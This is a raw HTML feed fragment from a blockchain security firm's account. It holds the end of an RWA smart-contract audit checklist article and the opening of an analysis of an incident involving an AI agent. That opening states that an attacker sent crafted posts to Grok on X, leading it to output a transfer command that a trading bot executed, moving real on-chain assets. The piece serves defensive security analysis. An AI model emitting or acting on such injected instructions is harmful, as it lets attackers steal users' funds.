style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">恶意事件日志审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Malicious Event Log Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">17</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">算术精度偏差审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Arithmetic Accuracy Deviation Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr><tr style="height:22.904458598726116pt;"><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">18</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">未初始化存储指针审计 </span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf=""><br/></span></span><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">(Uninitialized Storage Pointer Audit)</span></span></p></td><td style="border-left:solid #000000 0.75pt;border-right:solid #000000 0.75pt;border-bottom:solid #000000 0.75pt;border-top:solid #000000 0.75pt;vertical-align:middle;padding:4pt 11pt 4pt 9pt;overflow:hidden;overflow-wrap:break-word;"><p dir="ltr" style="line-height:1.2;text-align: center;margin-top:0pt;margin-bottom:0pt;"><span style="white-space:pre-wrap;font-size:10pt;font-family:Arial,sans-serif;color:#222222;background-color:transparent;font-weight:400;font-style:normal;font-variant:normal;text-decoration:none;vertical-align:baseline;"><span leaf="">-</span></span></p></td></tr></tbody></table></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">总结</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: normal;">RWA 的本质是信任的数字化。链上代码不仅需要准确映射现实世界的资产关系，还必须能够经受技术攻击与合规审查的双重约束。</span></span></b></b></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;" data-pm-slice="1 1 [&#34;para&#34;,{&#34;tagName&#34;:&#34;section&#34;,&#34;attributes&#34;:{},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;node&#34;,{&#34;tagName&#34;:&#34;b&#34;,&#34;attributes&#34;:{&#34;style&#34;:&#34;font-weight:normal;&#34;,&#34;data-pm-slice&#34;:&#34;0 0 []&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;},&#34;para&#34;,{&#34;tagName&#34;:&#34;p&#34;,&#34;attributes&#34;:{&#34;dir&#34;:&#34;ltr&#34;,&#34;style&#34;:&#34;text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;&#34;},&#34;namespaceURI&#34;:&#34;http://www.w3.org/1999/xhtml&#34;}]"><span textstyle="" style="font-weight: normal;">在对 RWA 协议形态与安全风险的持续研究中，慢雾(SlowMist) 已系统拆解现实世界资产上链的主要协议路径与实现机制，并从安全视角分析不同资产结构的风险差异，相关内容可延伸阅读：</span><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504861&amp;idx=1&amp;sn=0f71a6b7fafe17ee9cd5e6cf07b83e41&amp;scene=21#wechat_redirect" textvalue="慢雾出品｜链接真实世界资产：从协议族解析到安全实践。" data-itemshowtype="0" linktype="text" data-linktype="2"><span textstyle="" style="font-weight: normal;">慢雾出品｜链接真实世界资产：从协议族解析到安全实践。</span></a></span></b></b></b></b></p></b></b></b><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">未来，慢雾(SlowMist) </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">将持续把一线的安全能力转化并融入 RWA 审计实践，通过严谨的审计清单、前沿的 AI 辅助工具以及持续的情报监测，不断提升现实资产上链的安全水平。</span></span></b></b></b></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">我们期待与更多 RWA 项目方、机构及生态合作伙伴共同探索更可靠的安全实践路径，推动现实世界资产在 Web3 体系中的稳健落地。</span></span><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">如对 RWA 智能合约安全审计服务感兴趣，欢迎联系慢雾安全团队：</span></span></span><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">team@slowmist.com</span></span></span><span style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="color: rgb(255, 0, 0);font-weight: normal;">，或点击阅读原文了解服务详情。</span></span></span></b></b></b></p></b></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="letter-spacing: 0.544px;font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: left;"><div style="display: inline-block;width: 657.014px;vertical-align: top;border-bottom: 1px dashed rgb(160, 160, 160);border-bottom-right-radius: 0px;border-right: 1px dashed rgb(160, 160, 160);border-top-right-radius: 0px;border-left-width: 0px;"><div powered-by="xiumi.us"><div style="padding-right: 10px;padding-left: 10px;display: inline-block;border-style: solid;border-width: 1px 0px 0px 10px;box-shadow: rgb(0, 0, 0) 0px 0px 0px;border-color: rgb(54, 53, 53);border-radius: 0px;width: 629.769px;"><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">往期回顾</span></strong></span></p></div></div><div powered-by="xiumi.us"><div style="text-align: center;"><div style="padding: 10px 20px;display: inline-block;width: 656.019px;vertical-align: top;"><div style="margin-top: 8px;margin-bottom: 8px;"><div style="font-size: 14px;color: rgb(62, 62, 62);text-align: left;"><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504881&amp;idx=1&amp;sn=8c83bc9f82e684fdb75e04fade95913f&amp;scene=21#wechat_redirect" textvalue="Grok 被利用背后：AI Agent 权限链滥用分析" data-itemshowtype="0" linktype="text" data-linktype="2">Grok 被利用背后：AI Agent 权限链滥用分析</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504861&amp;idx=1&amp;sn=0f71a6b7fafe17ee9cd5e6cf07b83e41&amp;scene=21#wechat_redirect" textvalue="慢雾出品｜链接真实世界资产：从协议族解析到安全实践" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾出品｜链接真实世界资产：从协议族解析到安全实践</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504841&amp;idx=1&amp;sn=289fc7c20f2f00f8313ea5a5c378f90f&amp;scene=21#wechat_redirect" textvalue="慢雾 2026 香港 Web3 嘉年华之旅圆满收官!" data-itemshowtype="0" linktype="text" data-linktype="2">慢雾 2026 香港 Web3 嘉年华之旅圆满收官!</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504768&amp;idx=1&amp;sn=4589da9b7bea88de8f7b4dbd5cbfd0c8&amp;scene=21#wechat_redirect" textvalue="Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式" data-itemshowtype="0" linktype="text" data-linktype="2">Hacking Time 回顾：慢雾携手行业专家，深度拆解 AI &amp; Web3 的攻防新范式</a></span></p><p style="letter-spacing: 0.544px;"><span leaf=""><a class="normal_text_link" target="_blank" style="" href="https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504741&amp;idx=1&amp;sn=73749cca984e571fbcd6cac83e515423&amp;scene=21#wechat_redirect" textvalue="专访慢雾：Kelp DAO rsETH × LayerZero 事件是 DeFi 乐高结构系统性风险的集中爆发" data-itemshowtype="0" linktype="text" data-linktype="2">专访慢雾：Kelp DAO rsETH × LayerZero 事件是 DeFi 乐高结构系统性风险的集中爆发</a></span></p></div></div></div></div></div></div></div></div></div></div><p style="white-space: normal;text-align: center;margin-bottom: 0px;" nodeleaf=""><img data-aistatus="1" class="rich_pages wxw-img" data-ratio="3.9814814814814814" data-s="300,640" data-type="png" data-w="1080" style="letter-spacing: 0.578px;text-align: center;white-space: normal;width: 558px;pointer-events: initial;" data-croporisrc="https://mmbiz.qpic.cn/mmbiz_png/8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc/0?wx_fmt=png&amp;from=appmsg" data-cropselx2="558" data-cropsely2="2222" data-imgfileid="100021118" src="https://wechat2rss.xlab.app/img-proxy/?k=8009a386&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fmmbiz_png%2F8z8bibAexaCLqYqc9l9poJTcO8JBsibl6nSSJoiaasoqFToYClTV5oAl2oE6IcqhNsiciagmyhOAsRCrdxdrOKqxpZicVQqlu0WrcOb5vDfKMGsSc%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></p><div style="white-space: normal;font-family: -apple-system-font, BlinkMacSystemFont, &#34;Helvetica Neue&#34;, &#34;PingFang SC&#34;, &#34;Hiragino Sans GB&#34;, &#34;Microsoft YaHei UI&#34;, &#34;Microsoft YaHei&#34;, Arial, sans-serif;letter-spacing: 0.544px;background-color: rgb(255, 255, 255);color: rgb(160, 160, 160);font-size: 16px;margin-bottom: 0px;"><div powered-by="xiumi.us" style="padding-right: 10px;padding-left: 10px;font-size: 15px;line-height: 2;"><div style="font-size: 16px;"><div style="margin-top: 10px;margin-bottom: 10px;text-align: center;"><div style="padding: 10px;display: inline-block;width: 609.282px;border-width: 1px;border-style: solid;border-color: rgb(192, 200, 209);background-color: rgb(239, 239, 239);"><div><div style="font-size: 14px;line-height: 1.2;"><p><span style="color: rgb(0, 0, 0);"><strong><span style="font-size: 16px;"><span leaf="">慢雾导航</span></span></strong></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾科技官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://www.slowmist.com/" target="_blank">https://www.slowmist.com/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾区官网</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://slowmist.io/" target="_blank">https://slowmist.io/</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">慢雾 GitHub</span></strong></span></p><p><span style="text-decoration: underline;font-size: 12px;"><em><span leaf=""><a href="https://github.com/slowmist" target="_blank">https://github.com/slowmist</a></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Telegram</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.me/slowmistteam" target="_blank">https://t.me/slowmistteam</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Twitter</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://twitter.com/@slowmist_team" target="_blank">https://twitter.com/@slowmist_team</a></span></span></em></span></p><p><span style="color: rgb(0, 0, 0);"><strong><span leaf="">Medium</span></strong></span></p><p><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://medium.com/@slowmist" target="_blank">https://medium.com/@slowmist</a></span></span></em></span></p><p style="letter-spacing: 0.544px;"><span style="color: rgb(0, 0, 0);"><strong><span leaf="">知识星球</span></strong></span></p><p style="letter-spacing: 0.544px;"><span style="text-decoration: underline;"><em><span style="font-size: 12px;"><span leaf=""><a href="https://t.zsxq.com/Q3zNvvF" target="_blank">https://t.zsxq.com/Q3zNvvF</a></span></span></em></span></p></div></div></div></div></div></div></div><p style="display: none;"><mp-style-type data-value="3"></mp-style-type></p>


<p><a href="https://www.slowmist.com/service-smart-contract-security-audit.html">阅读原文</a></p>
<p><a href="https://wechat2rss.xlab.app/link-proxy/?k=f5a58e65&amp;r=1&amp;u=https%3A%2F%2Fmp.weixin.qq.com%2Fs%3F__biz%3DMzU4ODQ3NTM2OA%3D%3D%26mid%3D2247504886%26idx%3D1%26sn%3D6327c2cd38ad036a84e468f938309eb4">跳转微信打开</a></p>
]]></content:encoded>
      <pubDate>Thu, 07 May 2026 18:51:00 +0800</pubDate>
    </item>
    <item>
      <title>Grok 被利用背后：AI Agent 权限链滥用分析</title>
      <link>https://mp.weixin.qq.com/s?__biz=MzU4ODQ3NTM2OA==&amp;mid=2247504881&amp;idx=1&amp;sn=8c83bc9f82e684fdb75e04fade95913f</link>
      <description>一起典型的 AI Agent 权限链安全案例，核心在于“AI 自然语言输出”与“链上执行 Agent”的信任边界缺失。</description>
      <content:encoded><![CDATA[<p><span>慢雾安全团队</span> <span>2026-05-06 19:04</span> <span style="display: inline-block;">中国香港</span></p>






  
  <p><img src="https://wechat2rss.xlab.app/img-proxy/?k=5adf7371&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_jpg%2F8z8bibAexaCJ2hNABVy38kmqBuQR979iaia2pnAiaxPRaKSS0sdSBdPRwHQ8dwWZ42zXmDEUN8NlU5v3G0AoLMVeoXKvsemjknf0LVlMickO0mhk%2F0%3Fwx_fmt%3Djpeg"/></p>
  <p>一起典型的 AI Agent 权限链安全案例，核心在于“AI 自然语言输出”与“链上执行 Agent”的信任边界缺失。</p>
  <p><b data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><b style="font-weight:normal;" data-pm-slice="0 0 []"><h1 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 24px;font-weight: bold;">背景</span></span></h1><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">近日，Base 链上发生一起针对 AI Agent 与自动化交易系统结合的权限滥用事件。攻击者通过在 X 平台向 @grok 发送特定构造内容，诱导其输出被外部交易 Agent (@bankrbot) 识别的转账指令，最终导致链上真实资产转移。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"><img class="rich_pages wxw-img" data-aistatus="1" data-imgfileid="100021215" data-ratio="0.5074626865671642" width="523" data-type="png" data-w="938" height="265" style="margin-left: 0px;margin-top: 0px;" src="https://wechat2rss.xlab.app/img-proxy/?k=707a8d4c&amp;u=https%3A%2F%2Fmmbiz.qpic.cn%2Fsz_mmbiz_png%2F8z8bibAexaCJ4X4lK2QpUdruHd7OYibicolscCZkS3VNgmIpDYmhIhu2Y5CbYGqUOnZUNfQP0LZxZV8YxpJJkaDZrdx9ibaeszrrQPfUKJqDllw%2F640%3Fwx_fmt%3Dpng%26from%3Dappmsg"/></span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: center;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 14px;font-weight: normal;">(<a href="https://x.com/bankrbot/status/2051192437797015859)" target="_blank">https://x.com/bankrbot/status/2051192437797015859)</a></span></span></p><h2 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">关于“Grok 钱包”：</span></span></h2><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New 